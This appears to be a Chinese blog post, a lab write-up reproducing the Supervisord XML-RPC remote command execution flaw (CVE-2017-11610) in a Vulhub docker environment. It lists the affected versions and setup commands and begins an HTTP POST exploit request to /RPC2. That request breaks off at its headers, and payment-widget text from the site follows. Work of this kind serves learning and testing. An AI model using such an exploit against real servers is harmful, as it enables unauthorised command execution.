Vulhub Supervisord 远程命令执行漏洞复现

SupervisordXML-RPCServer远程命令执行漏洞CVE-2017-11610
文章介绍了Supervisord中一个XML-RPC服务器的安全漏洞,该漏洞允许远程攻击者通过特制的XML-RPC请求执行任意命令。受影响的版本包括3.0.1之前、3.1.4之前、3.2.4之前和3.3.3之前的版本。文中提供了漏洞复现的方法,包括使用POC执行命令和通过Metasploit生成shell脚本进行攻击。

漏洞介绍

漏洞简介

Supervisord是一款Python开发的一套进程控制系统,用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。 Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。

漏洞编号

CVE-2017-11610

影响版本

3.0.1之前的版本

3.1.4之前的3.1.x版本

3.2.4之前的3.2.x版本

3.3.3之前的3.3.x版本

环境搭建

cd /vulhub/supervisor/CVE-2017-11610

docker-compose up -d

访问 靶场IP:9001 验证靶场开启

漏洞复现

方法一

Payload如下:

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: applica
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值